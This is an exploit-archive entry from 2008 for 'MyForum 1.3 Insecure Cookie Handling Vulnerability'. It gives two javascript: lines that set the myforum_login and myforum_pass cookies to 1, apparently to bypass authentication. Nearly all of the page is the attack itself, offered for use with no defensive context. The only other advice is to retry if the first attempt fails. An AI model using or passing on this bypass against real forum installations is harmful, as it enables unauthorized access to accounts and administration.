[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MyForum 1.3 Insecure Cookie Handling Vulnerability
# Published : 2008-10-28
# Author : Stack
# Previous Title : e107 Plugin BLOG Engine 2.1.4 Remote SQL Injection Vulnerability
# Next Title : PersianBB (iranian_music.php id) Remote SQL Injection Vulnerability


###############################################################################################
[+] MyForum 1.3 Insecure Cookie Handling Vulnerability
[+] Discovered By : Mountassif Moad          
[+] Greetz : All my freind          
################################################################################################
Exploit:
javascript:document.cookie = "myforum_login=1; path=/";

javascript:document.cookie = "myforum_pass=1; path=/";
 
desc: if it dont work in the first test try another test 

# www.Syue.com [2008-10-28]